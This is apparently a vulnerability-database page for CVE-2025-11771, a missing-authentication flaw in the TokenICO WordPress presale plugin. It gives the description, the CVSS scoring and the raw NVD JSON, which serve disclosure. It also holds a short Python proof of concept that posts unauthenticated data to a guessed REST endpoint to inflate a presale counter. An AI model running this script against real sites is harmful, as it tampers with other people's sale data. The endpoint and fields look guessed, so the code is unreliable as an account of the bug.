Security Vulnerability Report
中文
CVE-2025-11771 CVSS 5.3 MEDIUM

CVE-2025-11771

Published: 2025-11-21 08:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'createSaleRecord' function in all versions up to, and including, 2.4.7. This makes it possible for unauthenticated attackers to manipulate presales counters.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TokenICO WordPress Plugin < 2.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-11771 PoC - Unauthenticated manipulation of presale counters # Target: WordPress site with TokenICO plugin < 2.4.8 target_url = "http://target-wordpress-site.com" # Identify the REST API endpoint for createSaleRecord function api_endpoint = f"{target_url}/wp-json/tokenico/v1/sale-record" # Prepare malicious payload to manipulate presale counter payload = { "sale_id": 1, "counter_value": 999999, "action": "create" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } # Send unauthenticated request to exploit the vulnerability try: response = requests.post( api_endpoint, json=payload, headers=headers, timeout=10 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code in [200, 201]: print("[+] Vulnerability confirmed - presale counter modified without authentication") else: print("[-] Request failed or patch already applied") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11771", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:50.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'createSaleRecord' function in all versions up to, and including, 2.4.7. This makes it possible for unauthenticated attackers to manipulate presales counters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L275", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3449189%40tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop&new=3449189%40tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c5793f-4d98-4ec1-a9b6-6e7c3f8b6099?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.